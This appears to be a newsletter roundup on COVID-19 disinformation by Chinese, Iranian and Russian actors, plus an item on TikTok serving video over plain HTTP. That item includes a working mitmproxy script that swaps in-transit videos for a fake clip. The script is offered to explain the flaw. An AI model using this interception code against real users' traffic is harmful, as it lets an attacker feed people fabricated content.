At a glance.
- Not quite a deep fake, but the possibility of a damaging fake.
- China's COVID-19 disinformation campaigns.
- Iran's derivative disinformation campaigns, with an excursus into quackery.
- Disinformation and delusion.
- Notes on an alleged Russian campaign against Western (especially US) science.
- Experts who should know better.
- The technical, practical, and ethical challenges of content moderation.
Video substitution in TikTok.
App developers posting at Mysk say that it's possible to show TikTok users fake videos, because the app fetches video content over unencrypted HTTP, leaving it open to tampering in transit. Naked Security was able to replicate their hack.
Erich Kron, Security Awareness Advocate at KnowBe4, commented on the demonstration: "Anytime an internet application uses HTTP instead of HTTPS, there is a risk of the information being modified in a man-in-the-middle attack. While this attack is possible, the risks are fairly low given the requirements needed to pull it off. You really should not be using TikTok as your source of important news without verifying its authenticity by going straight to the news media site to confirm it. It is critical that we teach people how to verify stories on legitimate websites, especially given the proliferation of misleading information in all areas of social media, especially during highly emotional times like this COVID-19 pandemic."
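For readers curious about the mechanics, here is a minimal sketch of the general technique, not the Mysk researchers' actual tooling: an interception proxy sitting between the app and its content delivery network can rewrite any response that travels over cleartext HTTP. The sketch assumes mitmproxy is installed and the device's traffic is routed through the proxy; the replacement filename is hypothetical.

```python
# swap_video.py -- a minimal mitmproxy addon sketch illustrating why plain
# HTTP is tamperable in transit (assumptions: mitmproxy is installed, the
# target app fetches video over HTTP, and its traffic passes through the
# proxy, e.g., via a rogue Wi-Fi access point).
# Run with: mitmdump -s swap_video.py
from mitmproxy import http

# Attacker-chosen replacement clip (hypothetical filename).
with open("fake.mp4", "rb") as f:
    FAKE_VIDEO = f.read()

def response(flow: http.HTTPFlow) -> None:
    # Only cleartext HTTP can be rewritten invisibly; a properly validated
    # TLS connection would detect this kind of tampering.
    content_type = flow.response.headers.get("content-type", "")
    if flow.request.scheme == "http" and content_type.startswith("video/"):
        # mitmproxy adjusts the Content-Length header automatically.
        flow.response.content = FAKE_VIDEO
```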
Short game: China's COVID-19 disinformation campaigns.
The Wall Street Journal has an overview of the shape, scope, and probable objectives of the Chinese government’s disinformation campaign concerning the coronavirus pandemic. The effort’s goals seem to be at least threefold. First, deflect any blame for mishandling the epidemic away from the Chinese government. This would include misleading accounts about the epidemic’s emergence and subsequent development as well as disinformation about its recent progress (for example, the claim that none of Hubei Province’s 42,000 healthcare workers were infected with COVID-19, a claim contradicted by earlier Journal reporting).
That first objective is related to the second: fix any blame there might be for the emergence of the virus somewhere else. That somewhere else has usually been the United States, China’s principal international rival, and the blame has taken the form of contentions either that the virus was a US biowar project gone (arguably) wrong, or that US personnel were somehow the initial infection vectors in Wuhan. These claims go further than the familiar charge that a natural disaster or epidemic has been made worse by official missteps or bungling: they often carry the implication of conspiracy. (And if there have been missteps or bungling, they weren’t made by the Chinese Communist Party.)
The fixation on an American origin story hasn’t prevented the development of domestic policies that focus on Africans resident in China as infection vectors. Quartz notes that a wave of evictions has pushed African migrants out of housing and denied them alternative accommodations. The governments of Ghana, Nigeria, Kenya, and Uganda have summoned Beijing’s ambassadors and demanded explanations.
And third, there’s a broader effort to portray China as a good international citizen, a reliable and technologically savvy provider of humanitarian aid. A contrast is generally drawn with the United States, with the Americans depicted as the opposite: unreliable, inept, and unfeeling. This amounts to a bid to displace the US, where possible, from exercising this kind of soft power. (That messaging is undercut by evictions of African migrants, but those evictions are for domestic consumption.)
The methods the Chinese services have adopted depend strongly on state-run media gaining access to social media audiences through advertising, with subsequent amplification in other social media posts. Researchers at the Stanford Internet Observatory told the Wall Street Journal that Beijing has purchased more than two hundred political ads on Facebook since the end of 2018. More than a third of those, however, were bought within the past two months, and those for the most part “focused on trying to shape global perception around China’s handling of the coronavirus outbreak.” China’s Facebook political advertising has drawn roughly forty-five million views since February 15th, which, in volume at least, exceeds the reach the Internet Research Agency, the notorious Russian troll farm, achieved around the 2016 US elections.
Facebook said last October that it would label ads purchased by state media, and Twitter says it’s banned advertising by state media. Chinese government operators, however, have proved able to run ads (unlabeled) on both platforms.
The method of the Chinese disinformation surrounding the coronavirus has been compared to Russian disinformation operations, and the two do have in common an effort to darken counsel and induce doubt. But whereas Russian operations have tended to be purely disruptive, the Chinese disinformation is organized to serve goals that are positive, at least from the Chinese government’s point of view. It’s also made more use of advertising.
Some of the disinformation has been heavy-handed and obvious, like an episode the National Review reports in which the Chinese Consulate in Chicago tried to get the Wisconsin legislature to pass a resolution praising China's handling of the Wuhan outbreak. But two other techniques are noteworthy, because they show some success. First, there’s a tendency to pick up casual posts along the lines of “you know, I had a funny cold a couple of months ago; wonder if it was coronavirus.” These are amplified to suggest that the virus had its origins outside of China. Second, there’s also a tendency to communicate by insinuation. Thus the claim that COVID-19 is the product of a US biowar program is typically made not by assertion, but by posing a question: Was COVID-19 an American weapon? Inquiring minds want to know. Shouldn’t this be investigated? We’re not saying it’s so, but it sure sounds suspicious. And so on.
Such conspiracy mongering gains traction with repetition. The intended audience is Southeast Asia, Eastern Europe, and Africa. But Foreign Affairs suggests that not as many are buying the Chinese line as Beijing might hope. An essay in Foreign Policy argues that the mistreatment of African expatriates in China during the virus response has damaged China's charm offensive in Africa. Another Foreign Policy piece points out that conspiracy theories in general are proving difficult to control.
Another short game: Iranian disinformation rides Beijing's coattails.
Chinese operators have been the most active purveyors of disinformation during the COVID-19 emergency, but other actors haven't been idle either. Graphika reports that an Iranian threat group, the International Union of Virtual Media (IUVM, a front operation), has been active in pushing the line that the coronavirus had its origins in a US biowar program. "The IUVM operation is significant and manned by a well-resourced and persistent actor, but its effectiveness should not be overstated," Graphika cautions. Their reach has been limited, attracting only around 3,000 followers, the Verge notes.
But persistent they have been. The group's accounts have been the repeated target of takedowns by Facebook, Google, and Twitter, but they continue to reappear. Their line is generally pro-Iranian and pro-Palestinian; anti-US, anti-Israel, anti-Turkey, and anti-Saudi. Like much Chinese disinformation (and unlike much Russian disinformation), the Iranian efforts aim at persuading an audience to a specific set of views, and not merely at disruption. On the principle that the enemy of my enemy is my friend, the IUVM has been heavily engaged in repeating stories that redound to Beijing's advantage. They generally praise China's response to the epidemic, dismiss criticism of Beijing as "psychological warfare," commend China's contributions to international emergency relief, and even praise China's business acumen in using the crisis as an opportunity to buy low and sell high.
Some Iranian disinformation has aimed at boosting domestic morale, with perhaps a secondary objective of burnishing the Islamic Republic's scientific chops in the rest of the world. Radio Free Europe | Radio Liberty reports that the Islamic Revolutionary Guard Corps (IRGC) has exhibited what it describes as a device capable of detecting COVID-19 by generating a magnetic field, revealing infection at distances of a hundred meters with no blood samples required. The IRGC credits scientists working for the Basij paramilitaries with the invention. The device on display, technical implausibility aside, seems to be the same bogus device sold by a crew of British fraudsters as a bomb detector. (The gentlemen and lady responsible for that scam, some of whose marks were in Iran, as it happens, were convicted in British courts and detained for some years at Her Majesty's pleasure. The BBC has the story. The device has a history going back to the 1990s, when American scam artists first introduced it as the "Gopher," a device golfers could use to find their lost balls on the course.) It's dowsing, with a little electromagnetic lipstick.
It's worth noting that Iran's Health Ministry quickly reacted to the IRGC's televised announcement of the screener by stressing that the device had been neither tested nor licensed. This suggests, first, that Iranian agencies aren't moving in lockstep, and also that the IRGC may have given in to quackery as opposed to having taken a decision to mount an elaborate disinformation campaign. The quack tends to believe his own press releases. Not so the charlatan, the scam artist, or the propagandist.
In any case, the story has met with some domestic skepticism. As Radio Free Europe | Radio Liberty points out, the local mood isn't in this case a particularly credulous one: "'The IRGC could not distinguish a passenger plane from a missile, how can we believe that it can detect a virus in nanometer dimensions in less than five seconds,' a user said on social media."
Other actors, mixing disinformation and delusion.
To return to conspiracy theories, they've been used with success by state actors (consider the tragic history of the Protocols of the Elders of Zion, an antisemitic forgery produced by the Tsarist Okhrana in the late Nineteenth Century that has contributed to as much suffering as any document we can think of). As noted above, such conspiracy mongering gains traction with repetition, and the intended audience of the COVID-19 theory Beijing has been retailing is Southeast Asia, Eastern Europe, and Africa. Much of the Chinese disinformation has been picked up, opportunistically, by Russian and Iranian services.
It’s also been picked up by non-state actors, extremists of various stripes or unwitting agents of influence adopting elements of the Chinese line. The agents of influence have tended to focus on isolated pieces of Chinese disinformation. The extremists who are retailing bogus conspiracy theories, mostly Islamist and far-right, according to the Washington Post, have been more independent if not particularly original. Their work has most often been a variation on an antisemitic theme, with calls for radicalization and incitement to action. One depressing social media post was from an Islamist extremist who said he was infected with COVID-19 and so was volunteering his services as a biological weapon. He was interested in hearing suggestions concerning targeting.
Long game: Russian disinformation aims at US science.
The New York Times claims that Russia has been running a long campaign aimed at undermining the authority of US scientific consensus on a range of topics, but especially on health-related and biomedical research. The “decade-long” disinformation campaign is said to have promoted quack treatments and questionable research, “undermining major institutions” and rendering outbreaks of disease more serious. The report sees some of the effects of that campaign manifesting themselves in the response to the COVID-19 pandemic. It’s a long game, and the goal is the usual one of darkening counsel and sowing mistrust.
One should be cautious, however, about attributing too much success to the campaign the New York Times describes. Bellingcat, no friend of the Kremlin, offers a number of animadversions about the Times story, most of which come down to reasons for thinking the Times too willing to take its examples of disinformation at the propagandists' own estimation. The report, for example, makes a great deal of a news aggregator called "Russophile." Russophile is real enough, but Bellingcat describes it as a small, route-step outfit with perhaps 3,000 followers or so. Even Russophile's claims to be based in Russia appear bogus.
Bellingcat also wants to insist on some useful distinctions, which seem right. To summarize them briefly, there are two terms that have come to be used interchangeably in reports of disinformation: bots and trolls. Bellingcat adds a third, obvious category: jerks. Bots are automated spewers of content. Trolls are not: when not controlled by some guiding intelligence service, they're just jerks who make a nuisance of themselves in chatrooms, comment sections, and social media. But a troll in the context of a disinformation campaign—like the ones run by the troll farmers of Saint Petersburg's Internet Research Agency—ah, those are jerks with marching orders, or nice guys paid to act like jerks, and to march. Bellingcat stresses that reach and consequence are important:
"Perhaps the most important lesson of addressing disinformation is to consider the importance and consequences of highlighting specific reports. Cherrypicking reports of disinformation is not terribly difficult — there are a bevy of “alternative news” sites that are ideologically driven and far from truthful in their publications. However, when a large media organization such as the New York Times lifts a little-read or obscure story, the tiny whimper of disinformation is transformed into something far louder and more dangerous.
"As of the time of this piece’s publication, the tweet from the Russophile account sharing the coronavirus disinformation described in the New York Times had one retweet and two favorites. An engagement of three people is, apparently, enough to warrant a reaction in the paper of record."
Russia has its own popular problems with pseudoscience and charlatan healers. Radio Free Europe | Radio Liberty notes that a late-Soviet-period psychic, Anatoly Kashpirovsky, has resurfaced as a presence on YouTube. (Lest Americans get too cocky, we will note that we've seen a lot more Peter Popoff healing-water commercials on TV lately, too.)
Disinformation is a challenge the US military may have trouble meeting.
State actors, notably China (defensively), Russia (disruptively), and to a lesser extent Iran (with conspiracy-mongering whacks at its two bêtes noires, the United States and Israel), have actively pushed various lines of disinformation about COVID-19's origins and propagation. A Military Times op-ed wonders how well prepared the US Department of Defense is to parry large-scale disinformation campaigns and concludes that the answer is "not very." The op-ed's authors see doctrinal confusion as presenting an obstacle to clarity (and to the assignment of roles and missions in ways that make operational sense).
Research that isn’t really, well, research, at least not yet. Or experts behaving badly.
Consider a simulation by researchers at the Eindhoven University of Technology, published as a gif showing how “droplets” might be spread in the “slipstream” of runners, cyclists, and others exercising out of doors. It’s been widely disseminated by people cautioning one another about the dangers of being out of doors at all, with so many COVID-19 vectors out there cropdusting away as they try to get some exercise.
The lead researcher complains, as quoted in Vice, that “people should read and not misread my tweets and texts,” but in this case the researchers have written so little that perhaps people should be forgiven for not reading what’s not really there. It’s often said that “data” is not the plural of “anecdote,” and it might be worth adding another useful rule-of-thumb: a gif is not a report of research.
Anyone familiar with the difficulties of simulating and predicting downwind hazards is unlikely to be taken in, but those who aren’t (and that’s most of us) may find the gif frightening and convincing. After all, there it is, in all the animated colors of the rainbow. Lead researcher Bert Blocken, a professor of aerodynamics, said, again according to Motherboard, “I have never and nowhere discouraged people from walking, running, or cycling. Rather the opposite. Maybe people should read more, and react less.”
But he did speak with Het Laatste Nieuws in order to warn people of the danger of getting too close to joggers, because after all, as he tweeted, "Crisis is urgent." So which is it? You can read the news articles and the tweets as closely as possible, with all the hermeneutical skills in the world, but without some extratextual knowledge you’d be spooked, too.
Looking ahead, some advocate a post-pandemic content moderation regime.
In fairness, content moderation is a tough and unfamiliar problem, even if you think of it in the slightly old-fashioned terms of rumor control. There's no easy list of best practices to inform effective counter-messaging. Some of the difficulty in handling disinformation may be seen in the speed with which misinformation spreads, and in the surprising reach even implausible memes can have. WIRED traces the strange conviction that COVID-19 is somehow related to 5G, and that such a relationship has been created by some conspiracy or other, to a January interview in a Belgian publication. (It’s a Flemish publication, by the way, so one would expect even more reach had it appeared in Francophone media, there being many more speakers of French in the world than there are speakers of Dutch.) It's since been picked up by the dreary and tiresome celebrity tribes of slacktivists and influencers, with regrettably but predictably far-reaching effects. Some of those effects have even been kinetic, as cell towers in the English Midlands have been vandalized and telecommunications workers threatened.
Another essay in WIRED offers a public health case for post-crisis regulation of political discourse. "We must recognize that political discourse is public health," is how it closes. How such content control might be accomplished isn't entirely clear, but the author's preferred solutions seem to run along corporatist lines. As an earlier slogan had it, the personal is political, and the argument in WIRED clearly asserts that rights reside primarily in communities, only secondarily in individuals. In certain communities, that is: some communities appear to be more equal than others. The epistemological, or narrative, question of what content is true and what false, or perhaps which is privileged and which problematic, would presumably remain to be worked out. As to establishing or reestablishing trust in the right authorities, see the notes above about slipstreams and virus detection with magnetic fields for some perspective on why that may be a harder sell than those who would see a convergence of political discourse and public health might think.